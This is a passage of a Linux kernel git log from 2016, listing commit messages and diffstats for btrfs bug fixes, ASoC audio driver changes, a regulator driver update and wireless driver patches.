Btrfs: don't leak reloc root nodes on error We don't track the reloc roots in any sort of normal way, so the only way the root/commit_root nodes get free'd is if the relocation finishes successfully and the reloc root is deleted. Fix this by free'ing them in free_reloc_roots. Thanks, Signed-off-by: Josef Bacik Signed-off-by: David Sterba fs/btrfs/relocation.c | 4 ++++ 1 file changed, 4 insertions(+) commit e2c8990734874061d144184dbf0d66e2827c216f Author: Masahiro Yamada Date: Tue Sep 13 04:35:52 2016 +0900 btrfs: squash lines for simple wrapper functions Remove unneeded variables and assignments. Signed-off-by: Masahiro Yamada Reviewed-by: David Sterba Signed-off-by: David Sterba fs/btrfs/check-integrity.c | 7 ++----- fs/btrfs/ctree.c | 4 +--- fs/btrfs/delayed-inode.c | 5 +---- fs/btrfs/extent-tree.c | 12 ++---------- fs/btrfs/send.c | 8 ++------ 5 files changed, 8 insertions(+), 28 deletions(-) commit 020eab35390b976e6b93b61805002d3e2cd195de Author: Nikita Yushchenko Date: Mon Sep 26 13:35:50 2016 +0300 ASoC: tpa6130a2: unmerge power enable error path from power disable path Code undo operations in power enable errror path explicitly, instead of reusing power disable path and playing with return values there. Signed-off-by: Nikita Yushchenko Signed-off-by: Mark Brown sound/soc/codecs/tpa6130a2.c | 18 ++++++++++++------ 1 file changed, 12 insertions(+), 6 deletions(-) commit 6b722c1747d533ac6d4df110dc8233db46918b65 Author: Liu Bo Date: Wed Sep 14 17:23:24 2016 -0700 Btrfs: improve check_node to avoid reading corrupted nodes We need to check items in a node to make sure that we're reading a valid one, otherwise we could get various crashes while processing delayed_refs. Signed-off-by: Liu Bo Reviewed-by: David Sterba Signed-off-by: David Sterba fs/btrfs/disk-io.c | 32 ++++++++++++++++++++++++++++---- 1 file changed, 28 insertions(+), 4 deletions(-) commit 899a247cf6d5bbb9eb799261791441d7d5ea2099 Author: Nikita Yushchenko Date: Mon Sep 26 12:56:51 2016 +0300 ASoC: simple-card: add support for aux devices Add device tree property to define auxiliary devices to be added to simle-audio-card. Together with proper audio routing definition, this allows to use simple-card in setups where separate amplifier chip is connected to codec's output. Signed-off-by: Nikita Yushchenko Signed-off-by: Mark Brown .../devicetree/bindings/sound/simple-card.txt | 37 ++++++++++++++++++++++ sound/soc/generic/simple-card.c | 34 ++++++++++++++++++++ 2 files changed, 71 insertions(+) commit a42cbec9c662ced87f1d0f22a1c114de4cf6e352 Author: Liu Bo Date: Wed Sep 14 17:23:39 2016 -0700 Btrfs: add error handling for extent buffer in print tree Somehow we missed btrfs_print_tree when last time we updated error handling for read_extent_block(). This keeps us from getting a NULL pointer panic when btrfs_print_tree's read_extent_block() fails. Signed-off-by: Liu Bo Signed-off-by: David Sterba fs/btrfs/print-tree.c | 7 +++++++ 1 file changed, 7 insertions(+) commit a43f7f82064220082eba7075c5a844d773fdef1b Author: Liu Bo Date: Tue Sep 13 19:15:48 2016 -0700 Btrfs: remove BUG_ON in start_transaction Since we could get errors from the concurrent aborted transaction, the check of this BUG_ON in start_transaction is not true any more. Say, while flushing free space cache inode's dirty pages, btrfs_finish_ordered_io -> btrfs_join_transaction_nolock (the transaction has been aborted.) -> BUG_ON(type == TRANS_JOIN_NOLOCK); Signed-off-by: Liu Bo Reviewed-by: Josef Bacik Signed-off-by: David Sterba fs/btrfs/transaction.c | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) commit 57a60cc3616c8f5447d914b646a1d6df2ba9cc9d Author: Charles Keepax Date: Mon Sep 26 10:15:24 2016 +0100 ASoC: wm_adsp: Allow preloader to do the final shutdown of the DSP The booting process for the DSP is clearly separated into two parts, the preloader brings up the core and downloads code, then the main widget starts the code actually executing. However the shutdown sequence is all handled with the main widget. To allow the preloading to be run independently of the main audio bring up it makes sense, and is generally just cleaner, for the preloader widget to shutdown those things it initialised. This patch moves the appropriate parts of the shutdown process into the preloader widget. Signed-off-by: Charles Keepax Signed-off-by: Mark Brown sound/soc/codecs/wm_adsp.c | 36 +++++++++++++++++++++--------------- sound/soc/codecs/wm_adsp.h | 2 +- 2 files changed, 22 insertions(+), 16 deletions(-) commit 90d19ba54b428a6bc8cc51ef6c60c6e65e6e2f35 Author: Charles Keepax Date: Mon Sep 26 10:15:23 2016 +0100 ASoC: wm_adsp: Put DSP into low power state between loading and running Between when we load the DSP and when it actually starts running put the core into a lower power state where the memory is retained but nothing is clocked. Signed-off-by: Charles Keepax Signed-off-by: Mark Brown sound/soc/codecs/wm_adsp.c | 18 +++++++++++++++++- 1 file changed, 17 insertions(+), 1 deletion(-) commit 1fa96f3fdad7cef5d043a502682580d2bc3d5ace Author: Charles Keepax Date: Mon Sep 26 10:15:22 2016 +0100 ASoC: wm_adsp: Use usleep_range for short delay Replace the 1ms msleep in wm_adsp2_ena with a usleep_range, as per normal guidance on delay functions. Also tighten up the delay a little as 1ms was quite generous. Signed-off-by: Charles Keepax Signed-off-by: Mark Brown sound/soc/codecs/wm_adsp.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) commit 3eb548ee3a8042d95ad81be254e67a5222c24e03 Author: Liu Bo Date: Wed Sep 14 17:22:57 2016 -0700 Btrfs: memset to avoid stale content in btree node block During updating btree, we could push items between sibling nodes/leaves, for leaves data sections starts reversely from the end of the block while for nodes we only have key pairs which are stored one by one from the start of the block. So we could do try to push key pairs from one node to the next node right in the tree, and after that, we update the node's nritems to reflect the correct end while leaving the stale content in the node. One may intentionally corrupt the fs image and access the stale content by bumping the nritems and causes various crashes. This takes the in-memory @nritems as the correct one and gets to memset the unused part of a btree node. Signed-off-by: Liu Bo Reviewed-by: David Sterba Signed-off-by: David Sterba fs/btrfs/extent_io.c | 11 +++++++++++ 1 file changed, 11 insertions(+) commit 88b456b0f4a2a4c10c141a7d83113a8ce2164463 Author: Mark Brown Date: Mon Sep 26 08:59:50 2016 -0700 ASoC: hdac_hdmi: Drop use of audio component framework to read ELD The audio component framework code has not yet landed in the i915 driver so drop the use of the API for the time being. Signed-off-by: Mark Brown Cc: Jeeja KP sound/soc/codecs/hdac_hdmi.c | 201 +++++++++++++++++++++++++++++++------------ 1 file changed, 145 insertions(+), 56 deletions(-) commit 3561b9db70928f207be4570b48fc19898eeaef54 Author: Liu Bo Date: Wed Sep 14 08:51:46 2016 -0700 Btrfs: return gracefully from balance if fs tree is corrupted When relocating tree blocks, we firstly get block information from back references in the extent tree, we then search fs tree to try to find all parents of a block. However, if fs tree is corrupted, eg. if there're some missing items, we could come across these WARN_ONs and BUG_ONs. This makes us print some error messages and return gracefully from balance. Signed-off-by: Liu Bo Reviewed-by: Josef Bacik Signed-off-by: David Sterba fs/btrfs/relocation.c | 23 +++++++++++++++++------ 1 file changed, 17 insertions(+), 6 deletions(-) commit 9c8e63db1de98c5cc3c6fb32d11b5cf55f228601 Author: Josef Bacik Date: Fri Sep 2 15:40:06 2016 -0400 Btrfs: kill BUG_ON()'s in btrfs_mark_extent_written No reason to bug on in here, fs corruption could easily cause these things to happen. Signed-off-by: Josef Bacik Signed-off-by: David Sterba fs/btrfs/file.c | 41 +++++++++++++++++++++++++++++++++-------- 1 file changed, 33 insertions(+), 8 deletions(-) commit 8436ea91a1c4fd8ed57ff0c0ca482ee3dbe744c7 Author: Josef Bacik Date: Fri Sep 2 15:40:03 2016 -0400 Btrfs: kill the start argument to read_extent_buffer_pages Nobody uses this, it makes no sense to do partial reads of extent buffers. Signed-off-by: Josef Bacik Signed-off-by: David Sterba fs/btrfs/disk-io.c | 13 ++++++------- fs/btrfs/extent_io.c | 28 ++++++++-------------------- fs/btrfs/extent_io.h | 2 +- 3 files changed, 15 insertions(+), 28 deletions(-) commit afcdd129e05a9210a5d19d4aa6e0afa475fc49e2 Author: Josef Bacik Date: Fri Sep 2 15:40:02 2016 -0400 Btrfs: add a flags field to btrfs_fs_info We have a lot of random ints in btrfs_fs_info that can be put into flags. This is mostly equivalent with the exception of how we deal with quota going on or off, now instead we set a flag when we are turning it on or off and deal with that appropriately, rather than just having a pending state that the current quota_enabled gets set to. Thanks, Signed-off-by: Josef Bacik Signed-off-by: David Sterba fs/btrfs/btrfs_inode.h | 11 --------- fs/btrfs/ctree.h | 43 +++++++++++++++++---------------- fs/btrfs/delayed-inode.c | 3 ++- fs/btrfs/delayed-ref.c | 6 +++-- fs/btrfs/disk-io.c | 23 +++++++----------- fs/btrfs/extent-tree.c | 14 +++++------ fs/btrfs/extent_io.c | 7 +++--- fs/btrfs/free-space-tree.c | 6 ++--- fs/btrfs/inode.c | 4 ++-- fs/btrfs/qgroup.c | 55 +++++++++++++++++++++++-------------------- fs/btrfs/relocation.c | 2 +- fs/btrfs/super.c | 2 +- fs/btrfs/tests/qgroup-tests.c | 2 +- fs/btrfs/transaction.c | 24 +++++++++---------- fs/btrfs/tree-log.c | 4 ++-- fs/btrfs/volumes.c | 2 +- 16 files changed, 99 insertions(+), 109 deletions(-) commit ba8b04c1d4adbc66f3653e3de5bd6c74a9a003bf Author: Qu Wenruo Date: Tue Jul 19 16:50:36 2016 +0800 btrfs: extend btrfs_set_extent_delalloc and its friends to support in-band dedupe and subpage size patchset Extend btrfs_set_extent_delalloc() and extent_clear_unlock_delalloc() parameters for both in-band dedupe and subpage sector size patchset. This should reduce conflict of both patchset and the effort to rebase them. Cc: Chandan Rajendra Cc: David Sterba Signed-off-by: Qu Wenruo Signed-off-by: David Sterba fs/btrfs/ctree.h | 2 +- fs/btrfs/extent_io.c | 2 +- fs/btrfs/extent_io.h | 2 +- fs/btrfs/file.c | 2 +- fs/btrfs/inode.c | 40 ++++++++++++++++++++++++++-------------- fs/btrfs/relocation.c | 2 +- fs/btrfs/tests/inode-tests.c | 12 ++++++------ 7 files changed, 37 insertions(+), 25 deletions(-) commit 897a41b1167955bd543bb252fd3f06f5844f2177 Author: Jeff Mahoney Date: Wed Aug 31 23:55:33 2016 -0400 btrfs: add dynamic debug support We can re-use the dynamic debugging descriptor to make use of the dynamic debugging mechanism but still use our own printk interface. Defining the DEBUG macro works as it did before. When it's defined, all of the messages default to print. We can also enable all debug messages at boot or module-load time using the 'dyndbg' and 'btrfs.dyndbg' options. Signed-off-by: Jeff Mahoney Reviewed-by: David Sterba Signed-off-by: David Sterba fs/btrfs/ctree.h | 31 ++++++++++++++++++++++++++++++- 1 file changed, 30 insertions(+), 1 deletion(-) commit 2309e79650100073ca8347279690742777c6698b Author: Luis Henriques Date: Tue Aug 23 23:23:23 2016 +0100 btrfs: Fix warning "variable ‘gen’ set but not used" Variable 'gen' in reada_for_search() is not used since commit 58dc4ce43251 ("btrfs: remove unused parameter from readahead_tree_block"). This patch simply removes this variable. Signed-off-by: Luis Henriques Reviewed-by: David Sterba Signed-off-by: David Sterba fs/btrfs/ctree.c | 2 -- 1 file changed, 2 deletions(-) commit 1f079fa2f8c5ddf0020c7fd820b2393564567a2a Author: Luis Henriques Date: Tue Aug 23 23:23:53 2016 +0100 btrfs: Fix warning "variable ‘blocksize’ set but not used" Variable 'blocksize' in reada_walk_down() is not used since commit d3e46fea1b1e ("btrfs: sink blocksize parameter to readahead_tree_block"). This patch simply removes this variable. Signed-off-by: Luis Henriques Reviewed-by: David Sterba Signed-off-by: David Sterba fs/btrfs/extent-tree.c | 2 -- 1 file changed, 2 deletions(-) commit 5d8eb6fe517583f9c6d5b94faf2254a0207a45c9 Author: Naohiro Aota Date: Fri Sep 2 16:46:32 2016 +0900 btrfs: let btrfs_delete_unused_bgs() to clean relocated bgs Currently, btrfs_relocate_chunk() is removing relocated BG by itself. But the work can be done by btrfs_delete_unused_bgs() (and it's better since it trim the BG). Let's dedupe the code. While btrfs_delete_unused_bgs() is already hitting the relocated BG, it skip the BG since the BG has "ro" flag set (to keep balancing BG intact). On the other hand, btrfs cannot drop "ro" flag here to prevent additional writes. So this patch make use of "removed" flag. btrfs_delete_unused_bgs() now detect the flag to distinguish whether a read-only BG is relocating or not. Signed-off-by: Naohiro Aota Reviewed-by: Josef Bacik Signed-off-by: David Sterba fs/btrfs/extent-tree.c | 2 +- fs/btrfs/volumes.c | 24 ++++++++++-------------- 2 files changed, 11 insertions(+), 15 deletions(-) commit 49303381f19ab16a371a061b67e783d3f570d56e Author: Liu Bo Date: Thu Aug 25 18:08:27 2016 -0700 Btrfs: bail out if block group has different mixed flag Currently we allow inconsistence about mixed flag (BTRFS_BLOCK_GROUP_METADATA | BTRFS_BLOCK_GROUP_DATA). We'd get ENOSPC if block group has mixed flag and btrfs doesn't. If that happens, we have one space_info with mixed flag and another space_info only with BTRFS_BLOCK_GROUP_METADATA, and global_block_rsv.space_info points to the latter one, but all bytes from block_group contributes to the mixed space_info, thus all the allocation will fail with ENOSPC. This adds a check for the above case. Reported-by: Vegard Nossum Signed-off-by: Liu Bo [ updated message ] Reviewed-by: David Sterba Signed-off-by: David Sterba fs/btrfs/extent-tree.c | 14 ++++++++++++++ 1 file changed, 14 insertions(+) commit 2571e739677f1e4c0c63f5ed49adcc0857923625 Author: Liu Bo Date: Wed Aug 3 12:33:01 2016 -0700 Btrfs: fix memory leak in reading btree blocks So we can read a btree block via readahead or intentional read, and we can end up with a memory leak when something happens as follows, 1) readahead starts to read block A but does not wait for read completion, 2) btree_readpage_end_io_hook finds that block A is corrupted, and it needs to clear all block A's pages' uptodate bit. 3) meanwhile an intentional read kicks in and checks block A's pages' uptodate to decide which page needs to be read. 4) when some pages have the uptodate bit during 3)'s check so 3) doesn't count them for eb->io_pages, but they are later cleared by 2) so we has to readpage on the page, we get the wrong eb->io_pages which results in a memory leak of this block. This fixes the problem by firstly getting all pages's locking and then checking pages' uptodate bit. t1(readahead) t2(readahead endio) t3(the following read) read_extent_buffer_pages end_bio_extent_readpage for pg in eb: for page 0,1,2 in eb: if pg is uptodate: btree_readpage_end_io_hook(pg) num_reads++ if uptodate: eb->io_pages = num_reads SetPageUptodate(pg) _______________ for pg in eb: for page 3 in eb: read_extent_buffer_pages if pg is NOT uptodate: btree_readpage_end_io_hook(pg) for pg in eb: __extent_read_full_page(pg) sanity check reports something wrong if pg is uptodate: clear_extent_buffer_uptodate(eb) num_reads++ for pg in eb: eb->io_pages = num_reads ClearPageUptodate(page) _______________ for pg in eb: if pg is NOT uptodate: __extent_read_full_page(pg) So t3's eb->io_pages is not consistent with the number of pages it's reading, and during endio(), atomic_dec_and_test(&eb->io_pages) will get a negative number so that we're not able to free the eb. Signed-off-by: Liu Bo Reviewed-by: David Sterba Signed-off-by: David Sterba fs/btrfs/extent_io.c | 9 +++++++++ 1 file changed, 9 insertions(+) commit e46a28ca3d0dce8d939b10d4c94eaa2307b6415a Author: Liu Bo Date: Fri Jul 29 10:57:55 2016 -0700 Btrfs: remove BUG() in raid56 This BUG() has been triggered by a fuzz testing image, which contains an invalid chunk type, ie. a single stripe chunk has the raid6 type. Btrfs can handle this gracefully by returning -EIO, so besides using btrfs_warn to give us more debugging information rather than a single BUG(), we can return error properly. Signed-off-by: Liu Bo Reviewed-by: David Sterba Signed-off-by: David Sterba fs/btrfs/raid56.c | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) commit afce772e87c36c7f07f230a76d525025aaf09e41 Author: Lu Fengqi Date: Mon Jun 13 09:36:46 2016 +0800 btrfs: fix check_shared for fiemap ioctl Only in the case of different root_id or different object_id, check_shared identified extent as the shared. However, If a extent was referred by different offset of same file, it should also be identified as shared. In addition, check_shared's loop scale is at least n^3, so if a extent has too many references, even causes soft hang up. First, add all delayed_ref to the ref_tree and calculate the unqiue_refs, if the unique_refs is greater than one, return BACKREF_FOUND_SHARED. Then individually add the on-disk reference(inline/keyed) to the ref_tree and calculate the unique_refs of the ref_tree to check if the unique_refs is greater than one.Because once there are two references to return SHARED, so the time complexity is close to the constant. Reported-by: Tsutomu Itoh Signed-off-by: Lu Fengqi Signed-off-by: David Sterba fs/btrfs/backref.c | 361 +++++++++++++++++++++++++++++++++++++++++++++++++-- fs/btrfs/extent_io.c | 18 ++- 2 files changed, 369 insertions(+), 10 deletions(-) commit b0de6c4c81099494d7863a31db06366f74395cda Author: David Sterba Date: Thu Sep 1 14:37:53 2016 +0200 btrfs: create example debugfs file only in debugging build Reviewed-by: Eric Sandeen Signed-off-by: David Sterba fs/btrfs/sysfs.c | 9 +++++++++ 1 file changed, 9 insertions(+) commit 07f6a480436595394a06a69d0ebc18fef6736197 Author: Eric Sandeen Date: Wed Aug 31 16:49:29 2016 -0500 btrfs: fix perms on demonstration debugfs interface btrfs provides a helpful demonstration of how to export a global variable via debugfs; however, it is unique among other debugfs files in that it is world-writable, which causes some concern to people who are not familiar with its purpose. Fix it so that it is only user-writable. Signed-off-by: Eric Sandeen Reviewed-by: David Sterba Signed-off-by: David Sterba fs/btrfs/sysfs.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) commit c79a175175d5a908a7c4d923d44f36808f56536e Author: Liu Bo Date: Wed Jul 20 17:44:12 2016 -0700 Btrfs: fix memory leak of block group cache While processing delayed refs, we may update block group's statistics and attach it to cur_trans->dirty_bgs, and later writing dirty block groups will process the list, which happens during btrfs_commit_transaction(). For whatever reason, the transaction is aborted and dirty_bgs is not processed in cleanup_transaction(), we end up with memory leak of these dirty block group cache. Since btrfs_start_dirty_block_groups() doesn't make it go to the commit critical section, this also adds the cleanup work inside it. Signed-off-by: Liu Bo Signed-off-by: David Sterba fs/btrfs/disk-io.c | 71 ++++++++++++++++++++++++++++++++++++++++++++++++++ fs/btrfs/disk-io.h | 2 ++ fs/btrfs/extent-tree.c | 2 ++ 3 files changed, 75 insertions(+) commit 5ff00f6aa84b7f4203f525fc6c4a4291e32c314d Author: Eric Jeong Date: Mon Sep 26 16:33:27 2016 +0900 regulator: pv88080: Update regulator for PV88080 BB silicon support Three files are modified, the driver, header file and the binding document. Updates for the regulator source file include and .of_match_table entry and node match checking in the probe() function for a compatible pv88080 silicon type. A new "HVBUCK" is added in source file and added regsiter definition in header file for pv88080 bb silicion. The binding documentation changes have been made to reflect these updates. Signed-off-by: Eric Jeong Signed-off-by: Mark Brown .../devicetree/bindings/regulator/pv88080.txt | 23 +- drivers/regulator/pv88080-regulator.c | 263 ++++++++++++++++++--- drivers/regulator/pv88080-regulator.h | 114 +++++---- 3 files changed, 322 insertions(+), 78 deletions(-) commit 89951db2be53106edbe0d24b3b5f9a787326daf6 Author: Ganapathi Bhat Date: Tue Sep 20 18:46:23 2016 +0530 mwifiex: cfg80211 set_default_mgmt_key handler Previously device used to start using IGTK key as Tx key as soon as it gets downloaded in add_key(). This patch implements set_default_mgmt_key handler. We will update Tx key ID in set_default_mgmt_key(). Signed-off-by: Ganapathi Bhat Signed-off-by: Amitkumar Karwar Signed-off-by: Kalle Valo drivers/net/wireless/marvell/mwifiex/cfg80211.c | 24 ++++++++++++++++++++++++ drivers/net/wireless/marvell/mwifiex/fw.h | 1 + drivers/net/wireless/marvell/mwifiex/ioctl.h | 1 + drivers/net/wireless/marvell/mwifiex/sta_cmd.c | 5 +++++ 4 files changed, 31 insertions(+) commit 33e40d025ed82fcab102035db38a727c914399a4 Author: Tony Lindgren Date: Sat Sep 17 09:06:33 2016 -0700 wlcore: wl18xx: Use chip specific configuration firmware Use the wl18xx specific config firmware we now have available. Signed-off-by: Tony Lindgren Signed-off-by: Kalle Valo drivers/net/wireless/ti/wl18xx/main.c | 19 ++++++++++--------- 1 file changed, 10 insertions(+), 9 deletions(-) commit 3e1ac932682b1377ae